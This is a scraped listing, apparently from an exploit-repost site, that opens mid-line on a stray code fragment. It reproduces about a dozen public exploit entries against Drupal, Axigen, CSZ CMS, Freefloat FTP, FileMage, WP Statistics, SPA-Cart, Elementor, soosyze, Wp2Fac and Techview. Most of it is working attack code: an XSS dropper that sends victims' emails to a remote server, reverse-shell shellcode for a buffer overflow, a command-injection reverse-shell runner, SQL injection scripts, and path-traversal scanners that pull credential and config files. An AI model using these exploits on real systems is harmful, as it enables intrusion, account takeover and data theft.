dnsspoof.py",shell=True) # Closing background processes after exploitation...
HireHackking

Drupal 10.1.2 - web-cache-poisoning-External-service-interaction

HACKER · %s · %s

## Title: drupal-10.1.2 web-cache-poisoning-External-service-interaction ## Author: nu11secur1ty ## Date: 08/30/2023 ## Vendor: https://www.drupal.org/ ## Software: https://www.drupal.org/download ## Reference: https://portswigger.net/kb/issues/00300210_external-service-interaction-http ## Description: It is possible to induce the application to perform server-side HTTP requests to arbitrary domains. The payload d7lkti6pq8fjkx12ikwvye34ovuoie680wqjg75.oastify.com was submitted in the HTTP Host header. The application performed an HTTP request to the specified domain. For the second test, the attacker stored a response on the server with malicious content. This can be bad for a lot of users of this system if the attacker spreads a malicious URL and sends it by email etc. By using a redirect exploit. STATUS: HIGH-Vulnerability [+]Exploit: ```GET GET /drupal/web/?psp4hw87ev=1 HTTP/1.1 Host: d7lkti6pq8fjkx12ikwvye34ovuoie680wqjg75.oastify.com Accept-Encoding: gzip, deflate, psp4hw87ev Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7, text/psp4hw87ev Accept-Language: en-US,psp4hw87ev;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36 psp4hw87ev Connection: close Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116" Sec-CH-UA-Platform: Windows Sec-CH-UA-Mobile: ?0 Origin: https://psp4hw87ev.pwnedhost.com ``` [+]Response from Burpcollaborator server: ```HTTP HTTP/1.1 200 OK Server: Burp Collaborator https://burpcollaborator.net/ X-Collaborator-Version: 4 Content-Type: text/html Content-Length: 62 <html><body>zeq5zcbz3x69x9a63ubxidzjlgigmmgifigz</body></html> ``` [+]Response from Attacker server ```HTTP 192.168.100.45 - - [30/Aug/2023 05:52:56] "GET /drupal/web/rss.xml?psp4hw87ev=1 HTTP/1.1" ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/DRUPAL/2013/drupal-10.1.2) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2023/08/drupal-1012-web-cache-poisoning.html) ## Time spend: 03:35:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/> -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>
HireHackking

Axigen < 10.3.3.47, 10.2.3.12 - Reflected XSS

HACKER · %s · %s

# Exploit Title: Axigen < 10.3.3.47, 10.2.3.12 - Reflected XSS # Google Dork: inurl:passwordexpired=yes # Date: 2023-08-21 # Exploit Author: AmirZargham # Vendor Homepage: https://www.axigen.com/ # Software Link: https://www.axigen.com/mail-server/download/ # Version: (10.5.0–4370c946) and older version of Axigen WebMail # Tested on: firefox,chrome # CVE: CVE-2022-31470 Exploit We use the second Reflected XSS to exploit this vulnerability, create a malicious link, and steal user emails. Dropper code This dropper code, loads and executes JavaScript exploit code from a remote server. '); x = document.createElement('script'); x.src = 'https://example.com/exploit.js'; window.addEventListener('DOMContentLoaded',function y(){ document.body.appendChild(x) })// Encoded form /index.hsp?m=%27)%3Bx%3Ddocument.createElement(%27script%27)%3Bx.src%3D%27 https://example.com/exploit.js%27%3Bwindow.addEventListener(%27DOMContentLoaded%27,function+y(){document.body.appendChild(x)})// Exploit code xhr1 = new XMLHttpRequest(), xhr2 = new XMLHttpRequest(), xhr3 = new XMLHttpRequest(); oob_server = 'https://example.com/'; var script_tag = document.createElement('script'); xhr1.open('GET', '/', true); xhr1.onreadystatechange = () => { if (xhr1.readyState === XMLHttpRequest.DONE) { _h_cookie = new URL(xhr1.responseURL).search.split("=")[1]; xhr2.open('PATCH', `/api/v1/conversations/MQ/?_h=${_h_cookie}`, true); xhr2.setRequestHeader('Content-Type', 'application/json'); xhr2.onreadystatechange = () => { if (xhr2.readyState === XMLHttpRequest.DONE) { if (xhr2.status === 401){ script_tag.src = `${oob_server}?status=session_expired&domain=${document.domain}`; document.body.appendChild(script_tag); } else { resp = xhr2.responseText; folderId = JSON.parse(resp)["mails"][0]["folderId"]; xhr3.open('GET', `/api/v1/conversations?folderId=${folderId}&_h=${_h_cookie}`, true); xhr3.onreadystatechange = () => { if (xhr3.readyState === XMLHttpRequest.DONE) { emails = xhr3.responseText; script_tag.src = `${oob_server}?status=ok&domain=${document.domain}&emails=${btoa(emails)}`; document.body.appendChild(script_tag); } }; xhr3.send(); } } }; var body = JSON.stringify({isUnread: false}); xhr2.send(body); } }; xhr1.send(); Combining dropper and exploit You can host the exploit code somewhere and then address it in the dropper code.
HireHackking
# Exploit Title: CSZ CMS 1.3.0 - Stored Cross-Site Scripting ('Photo URL' and 'YouTube URL' ) # Date: 2023/08/18 # CVE: CVE-2023-38910 # Exploit Author: Daniel González # Vendor Homepage: https://www.cszcms.com/ # Software Link: https://github.com/cskaza/cszcms # Version: 1.3.0 # Tested on: CSZ CMS 1.3.0 # Description: # CSZ CMS 1.3.0 is vulnerable to cross-site scripting (XSS), which allows attackers to execute arbitrary web scripts or HTML via a crafted payload entered in the 'Carousel Wiget' section and choosing our carousel widget created above, in 'Photo URL' and 'YouTube URL' plugin. # Steps to reproduce Stored XSS: Go to url http://localhost/admin/carousel. We edit that Carousel that we have created and see that we can inject arbitrary web scripts or HTML into the “Youtube URL” and “Photo URL” fields. We can inject HTML code. With the following payload we can achieve the XSS. Payload: <div><p title="</div><svg/onload=alert(document.domain)>"> #PoC Request: POST http://localhost:8080/admin/carousel/addUrl/3 HTTP/1.1 Host: localhost:8080 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/116.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 137 Origin: http://localhost:8080 Referer: http://localhost:8080/admin/carousel/edit/3 Upgrade-Insecure-Requests: 1 carousel_type=multiimages&photo_url=%3Cdiv%3E%3Cp+title%3D%22%3C%2Fdiv%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E%22%3E&submit=Add
HireHackking

Freefloat FTP Server 1.0 - 'PWD' Remote Buffer Overflow

HACKER · %s · %s

#Exploit title: Freefloat FTP Server 1.0 - 'PWD' Remote Buffer Overflow #Date: 08/22/2023 #Exploit Author: Waqas Ahmed Faroouqi (ZEROXINN) #Vendor Homepage: http://www.freefoat.com #Version: 1.0 #Tested on Windows XP SP3 #!/usr/bin/python import socket #Metasploit Shellcode #msfvenom -p windows/shell_reverse_tcp LHOST=192.168.146.134 LPORT=4444 -b '\x00\x0d' #nc -lvp 4444 #Send exploit #offset = 247 #badchars=\x00\x0d\ #return_address=\x3b\x69\x5a\x77 (ole32.dll) payload = ( "\xb8\xf3\x93\x2e\x96\xdb\xca\xd9\x74\x24\xf4\x5b\x31\xc9" "\xb1\x52\x31\x43\x12\x83\xeb\xfc\x03\xb0\x9d\xcc\x63\xca" "\x4a\x92\x8c\x32\x8b\xf3\x05\xd7\xba\x33\x71\x9c\xed\x83" "\xf1\xf0\x01\x6f\x57\xe0\x92\x1d\x70\x07\x12\xab\xa6\x26" "\xa3\x80\x9b\x29\x27\xdb\xcf\x89\x16\x14\x02\xc8\x5f\x49" "\xef\x98\x08\x05\x42\x0c\x3c\x53\x5f\xa7\x0e\x75\xe7\x54" "\xc6\x74\xc6\xcb\x5c\x2f\xc8\xea\xb1\x5b\x41\xf4\xd6\x66" "\x1b\x8f\x2d\x1c\x9a\x59\x7c\xdd\x31\xa4\xb0\x2c\x4b\xe1" "\x77\xcf\x3e\x1b\x84\x72\x39\xd8\xf6\xa8\xcc\xfa\x51\x3a" "\x76\x26\x63\xef\xe1\xad\x6f\x44\x65\xe9\x73\x5b\xaa\x82" "\x88\xd0\x4d\x44\x19\xa2\x69\x40\x41\x70\x13\xd1\x2f\xd7" "\x2c\x01\x90\x88\x88\x4a\x3d\xdc\xa0\x11\x2a\x11\x89\xa9" "\xaa\x3d\x9a\xda\x98\xe2\x30\x74\x91\x6b\x9f\x83\xd6\x41" "\x67\x1b\x29\x6a\x98\x32\xee\x3e\xc8\x2c\xc7\x3e\x83\xac" "\xe8\xea\x04\xfc\x46\x45\xe5\xac\x26\x35\x8d\xa6\xa8\x6a" "\xad\xc9\x62\x03\x44\x30\xe5\xec\x31\xa8\x73\x84\x43\xcc" "\x6a\x09\xcd\x2a\xe6\xa1\x9b\xe5\x9f\x58\x86\x7d\x01\xa4" "\x1c\xf8\x01\x2e\x93\xfd\xcc\xc7\xde\xed\xb9\x27\x95\x4f" "\x6f\x37\x03\xe7\xf3\xaa\xc8\xf7\x7a\xd7\x46\xa0\x2b\x29" "\x9f\x24\xc6\x10\x09\x5a\x1b\xc4\x72\xde\xc0\x35\x7c\xdf" "\x85\x02\x5a\xcf\x53\x8a\xe6\xbb\x0b\xdd\xb0\x15\xea\xb7" "\x72\xcf\xa4\x64\xdd\x87\x31\x47\xde\xd1\x3d\x82\xa8\x3d" "\x8f\x7b\xed\x42\x20\xec\xf9\x3b\x5c\x8c\x06\x96\xe4\xac" "\xe4\x32\x11\x45\xb1\xd7\x98\x08\x42\x02\xde\x34\xc1\xa6" "\x9f\xc2\xd9\xc3\x9a\x8f\x5d\x38\xd7\x80\x0b\x3e\x44\xa0" "\x19") shellcode = 'A' * 247 + "\x3b\x69\x5a\x77" + '\x90' * 10 + payload def main(): ip = '192.168.146.135' port = 21 sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((ip, port)) sock.recv(1024) sock.send('USER anonymous\r\n') sock.recv(1024) sock.send('PASS anonymous\r\n') sock.recv(1024) sock.send('pwd ' + shellcode + '\r\n') sock.close() if __name__ == '__main__': main()
HireHackking

FileMage Gateway 1.10.9 - Local File Inclusion

HACKER · %s · %s

# Exploit Title: FileMage Gateway 1.10.9 - Local File Inclusion # Date: 8/22/2023 # Exploit Author: Bryce "Raindayzz" Harty # Vendor Homepage: https://www.filemage.io/ # Version: Azure Versions < 1.10.9 # Tested on: All Azure deployments < 1.10.9 # CVE : CVE-2023-39026 # Technical Blog - https://raindayzz.com/technicalblog/2023/08/20/FileMage-Vulnerability.html # Patch from vendor - https://www.filemage.io/docs/updates.html import requests import warnings warnings.filterwarnings("ignore") def worker(url): response = requests.get(url, verify=False, timeout=.5) return response def main(): listIP = [] file_path = input("Enter the path to the file containing the IP addresses: ") with open(file_path, 'r') as file: ip_list = file.read().splitlines() searchString = "tls" for ip in ip_list: url = f"https://{ip}" + "/mgmnt/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cprogramdata%5cfilemage%5cgateway%5cconfig.yaml" try: response = worker(url) #print(response.text) if searchString in response.text: print("Vulnerable IP: " + ip) print(response.text) listIP.append(ip) except requests.exceptions.RequestException as e: print(f"Error occurred for {ip}: {str(e)}") for x in listIP: print(x) if __name__ == '__main__': main()
HireHackking

DLINK DPH-400SE - Exposure of Sensitive Information

HACKER · %s · %s

# Exploit Title : DLINK DPH-400SE - Exposure of Sensitive Information # Date : 25-08-2023 # Exploit Author : tahaafarooq # Vendor Homepage : https://dlink.com/ # Version : FRU2.2.15.8 # Tested on: DLINK DPH-400SE (VoIP Phone) Description: With default credential for the guest user "guest:guest" to login on the web portal, the guest user can head to maintenance tab under access and modify the users which allows guest user to modify all users as well as view passwords for all users. For a thorough POC writeup visit: https://hackmd.io/@tahaafarooq/dlink-dph-400se-cwe-200 POC : 1. Login with the default guest credentials "guest:guest" 2. Access the Maintenance tab. 3. Under the maintenance tab, access the "Access" feature 4. On "Account Option" choose a user to modify, thus "Admin" and click modify. 5. Right click on the password, and click reveal, the password is then seen in plaintext.
HireHackking
# Exploit Title: WP Statistics Plugin <= 13.1.5 current_page_id - Time based SQL injection (Unauthenticated) # Date: 13/02/2022 # Exploit Author: psychoSherlock # Vendor Homepage: https://wp-statistics.com/ # Software Link: https://downloads.wordpress.org/plugin/wp-statistics.13.1.5.zip # Version: 13.1.5 and prior # Tested on: wp-statistics 13.1.5 # CVE : CVE-2022-25148 # Vendor URL: https://wordpress.org/plugins/wp-statistics/ # CVSS Score: 8.4 (High) import argparse import requests import re import urllib.parse def main(): parser = argparse.ArgumentParser(description="CVE-2022-25148") parser.add_argument('-u', '--url', required=True, help='Wordpress base URL') args = parser.parse_args() baseUrl = args.url payload = "IF(1=1, sleep(5), 1)" wp_session = requests.session() resp = wp_session.get(baseUrl) nonce = re.search(r'_wpnonce=(.*?)&wp_statistics_hit', resp.text).group(1) print(f"Gathered Nonce: {nonce}") headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15"} payload = urllib.parse.quote_plus(payload) exploit = f'/wp-json/wp-statistics/v2/hit?_=11&_wpnonce={nonce}&wp_statistics_hit_rest=&browser=&platform=&version=&referred=&ip=11.11.11.11&exclusion_match=no&exclusion_reason&ua=Something&track_all=1&timestamp=11&current_page_type=home&current_page_id={payload}&search_query&page_uri=/&user_id=0' exploit_url = baseUrl + exploit print(f'\nSending: {exploit_url}') resp = wp_session.get(exploit_url, headers=headers) if float(resp.elapsed.total_seconds()) >= 5.0: print("\n!!! Target is vulnerable !!!") print(f'\nTime taken: {resp.elapsed.total_seconds()}') else: print('Target is not vulnerable') if __name__ == "__main__": main()
HireHackking

SPA-Cart eCommerce CMS 1.9.0.3 - SQL Injection

HACKER · %s · %s

# Exploit Title: SPA-Cart eCommerce CMS 1.9.0.3 - SQL Injection # Exploit Author: CraCkEr # Date: 20/08/2023 # Vendor: SPA-Cart # Vendor Homepage: https://spa-cart.com/ # Software Link: https://demo.spa-cart.com/ # Version: 1.9.0.3 # Tested on: Windows 10 Pro # Impact: Database Access # CVE: CVE-2023-4548 # CWE: CWE-89 / CWE-74 / CWE-707 ## Greetings The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka CryptoJob (Twitter) twitter.com/0x0CryptoJob ## Description SQL injection attacks can allow unauthorized access to sensitive data, modification of data and crash the application or make it unavailable, leading to lost revenue and damage to a company's reputation. Path: /search GET parameter 'filter[brandid]' is vulnerable to SQL Injection https://website/search?filtered=1&q=11&load_filter=1&filter[brandid]=[SQLi]&filter[price]=100-500&filter[attr][Memory][]=500%20GB&filter[attr][Color][]=Black --- Parameter: filter[brandid] (GET) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (query SLEEP) Payload: filtered=1&q=11&load_filter=1&filter[brandid]=4'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z&filter[price]=100-500&filter[attr][Memory][]=500 GB&filter[attr][Color][]=Black --- [-] Done
HireHackking

Wordpress Plugin Elementor 3.5.5 - Iframe Injection

HACKER · %s · %s

# Exploit Title: Wordpress Plugin Elementor < 3.5.5 - Iframe Injection # Date: 28.08.2023 # Exploit Author: Miguel Santareno # Vendor Homepage: https://elementor.com/ # Version: < 3.5.5 # Tested on: Google and Firefox latest version # CVE : CVE-2022-4953 # 1. Description The plugin does not filter out user-controlled URLs from being loaded into the DOM. This could be used to inject rogue iframes that point to malicious URLs. # 2. Proof of Concept (PoC) Proof of Concept: https://vulnerable-site.tld/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoidmlkZW8iLCJ1cmwiOiJodHRwczovL2Rvd25sb2FkbW9yZXJhbS5jb20vIn0K
HireHackking

soosyze 2.0.0 - File Upload

HACKER · %s · %s

## Title: soosyze 2.0.0 - File Upload ## Author: nu11secur1ty ## Date: 04.26.2023-08.28.2023 ## Vendor: https://soosyze.com/ ## Software: https://github.com/soosyze/soosyze/releases/tag/2.0.0 ## Reference: https://portswigger.net/web-security/file-upload ## Description: Broken file upload logic. The malicious user can upload whatever he wants to an HTML file and when he tries to execute it he views almost all file paths. This could be worse than ever, it depends on the scenario. STATUS: HIGH Vulnerability [+]Exploit: ```HTML <!DOCTYPE html> <html> <head> <title>Hello broken file upload logic, now I can read your special directory pats, thank you ;)</title> </head> <body> <h1> <?php phpinfo(); ?> </h1> </body> </html> ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/soosyze/2023/soosyze-2.0.0) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2023/05/soosyze-200-file-path-traversal-broken.html) ## Time spend: 01:27:00
HireHackking

Wp2Fac - OS Command Injection

HACKER · %s · %s

# Exploit Title: Wp2Fac v1.0 - OS Command Injection # Date: 2023-08-27 # Exploit Author: Ahmet Ümit BAYRAM # Vendor: https://github.com/metinyesil/wp2fac # Tested on: Kali Linux & Windows 11 # CVE: N/A import requests def send_post_request(host, revshell): url = f'http://{host}/send.php' headers = { 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0', 'Accept': '*/*', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8', 'X-Requested-With': 'XMLHttpRequest', 'Origin': f'http://{host}', 'Connection': 'close', 'Referer': f'http://{host}/', } data = { 'numara': f'1234567890 & {revshell} &;' } response = requests.post(url, headers=headers, data=data) return response.text host = input("Target IP: ") revshell = input("Reverse Shell Command: ") print("Check your listener!") send_post_request(host, revshell)
HireHackking
# Exploit Title: Techview LA-5570 Wireless Gateway Home Automation Controller - Multiple Vulnerabilities # Google Dork: N/A # Date: 25/08/2023 # Exploit Author: The Security Team [exploitsecurity.io<http://exploitsecurity.io>] # Vendor Homepage: https://www.jaycar.com.au/wireless-gateway-home-automation-controller/p/LA5570 # Software Link: N/A # Version: 1.0.19_T53 # Tested on: MACOS/Linux # CVE : CVE-2023-34723 # POC Code Available: https://www.exploitsecurity.io/post/cve-2023-34723-cve-2023-34724-cve-2023-34725 #!/opt/homebrew/bin/python3 import requests import sys from time import sleep from urllib3.exceptions import InsecureRequestWarning from colorama import init from colorama import Fore, Back, Style import re import os import ipaddress requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) def banner(): if os.name == 'posix': clr_cmd = ('clear') elif os.name == 'nt': clr_cmd = ('cls') os.system(clr_cmd) print ("[+]****************************************************[+]") print (" | Author : The Security Team |") print (" | Company : "+Fore.RED+ "Exploit Security" +Style.RESET_ALL+"\t\t\t|") print (" | Description : TechVIEW LA-5570 Directory Traversal |") print (" | Usage : "+sys.argv[0]+" <target> |") print ("[+]****************************************************[+]") def usage(): print (f"Usage: {sys.argv[0]} <target>") def main(target): domain = "http://"+target+"/config/system.conf" try: url = domain.strip() r = requests.get(url, verify=False, timeout=3) print ("[+] Retrieving credentials", flush=True, end='') sleep(1) print(" .", flush=True, end='') sleep(1) print(" .", flush=True, end='') sleep(1) print(" .", flush=True, end='') if ("system_password" in r.text): data = (r.text.split("\n")) print (f"\n{data[1]}") else: print (Fore.RED + "[!] Target is not vulnerable !"+ Style.RESET_ALL) except TimeoutError: print (Fore.RED + "[!] Timeout connecting to target !"+ Style.RESET_ALL) except KeyboardInterrupt: return except requests.exceptions.Timeout: print (Fore.RED + "[!] Timeout connecting to target !"+ Style.RESET_ALL) return if __name__ == '__main__': if len(sys.argv)>1: banner() target = sys.argv[1] try: validate = ipaddress.ip_address(target) if (validate): main (target) except ValueError as e: print (Fore.RED + "[!] " + str(e) + " !" + Style.RESET_ALL) else: print (Fore.RED + f"[+] Not enough arguments, please specify target !" + Style.RESET_ALL)